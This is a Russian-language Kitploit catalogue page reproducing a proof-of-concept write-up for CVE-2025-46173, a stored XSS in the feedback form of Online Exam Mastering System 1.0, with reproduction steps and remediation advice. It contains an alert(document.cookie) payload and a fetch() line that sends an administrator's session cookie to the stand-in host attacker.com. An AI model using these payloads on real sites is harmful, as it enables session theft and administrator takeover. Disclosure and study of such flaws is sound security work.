Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-46173 — poc for the CVE-2025-46173 | Kitploit
Инструменты/GitHubGitHub/pruthuraut/cve-2025-46173
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubpruthuraut/cve-2025-46173

CVE-2025-46173

poc for the CVE-2025-46173

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-46173 - Межсайтовый скриптинг (XSS) с сохранением в Online Exam Mastering System 1.0

📌 Краткое описание

CVE-2025-46173 — это уязвимость межсайтового скриптинга с сохранением (XSS), обнаруженная в Online Exam Mastering System 1.0 от code-projects. Уязвимость присутствует в компоненте feedback.php, где ввод пользователя в поле имени недостаточно очищается, что позволяет злоумышленнику внедрить произвольный JavaScript. Когда администратор просматривает этот отзыв в панели управления (dash.php), нагрузка выполняется в браузере администратора, что приводит к перехвату сессии и потенциальному повышению привилегий.


🧠 Детали уязвимости

  • Тип уязвимости: Межсайтовый скриптинг с сохранением (XSS)
  • Идентификатор CVE: CVE-2025-46173
  • Вендор: code-projects
  • Продукт: Online Exam Mastering System
  • Затронутая версия: 1.0
  • Компонент: feedback.php, dash.php
  • Вектор атаки: Удаленный
  • Влияние: Повышение привилегий, перехват сессии

📷 Подтверждение концепции

1. Внедрение

Пользователь отправляет следующую нагрузку в поле Имя в форме обратной связи:

root@kitploit:~
<script>alert(document.cookie)</script>

Payload in Feedback Form

2. Запуск

Когда администратор позже просматривает отправленный отзыв в dash.php, нагрузка выполняется:

Admin Trigger XSS

3. Результат

Сессионный cookie администратора становится доступным через document.cookie, который может быть извлечен:

root@kitploit:~
<script>
  fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>

⚙️ Шаги для воспроизведения

  1. Клонируйте или настройте уязвимую версию с code-projects.

  2. Перейдите по адресу localhost/exam/feedback.php.

  3. Заполните поле "Имя" следующим:

    root@kitploit:~
    <script>alert(document.cookie)</script>
    
  4. Отправьте форму.

  5. Войдите как администратор и перейдите на dash.php?q=3, чтобы просмотреть отзывы.

  6. Скрипт выполнится в контексте администратора.


🔥 Влияние

  • Похищение сессионных cookie администратора
  • Выдача себя за администратора
  • Получение полного административного доступа
  • Изменение или удаление тестовых данных
  • Повышение привилегий

🔒 Рекомендуемые меры по устранению

  • Очищайте пользовательский ввод, экранируя специальные HTML-символы (например, &, <, >, ").
  • Используйте надежную библиотеку очистки, такую как htmlspecialchars() в PHP, или комбинацию проверки на фронтенде и очистки на бэкенде.
  • Внедрите политику безопасности контента (CSP).
  • Рассмотрите возможность кодирования данных перед отображением в DOM.

🔗 Ссылки

  • Слепой межсайтовый скриптинг (Invicti)
  • Acunetix - Обнаружение слепого XSS
  • Шпаргалка OWASP по предотвращению XSS

👤 Обнаружитель

Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub


Скриншоты предназначены только для образовательных целей. Все тестирование проводилось в локальной среде.

🎥 Видео PoC

Нажмите здесь, чтобы посмотреть демонстрационное видео


⚠️ Отказ от ответственности

Эта информация предоставляется только в образовательных и исследовательских целях. Не используйте ее в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Скачать инструмент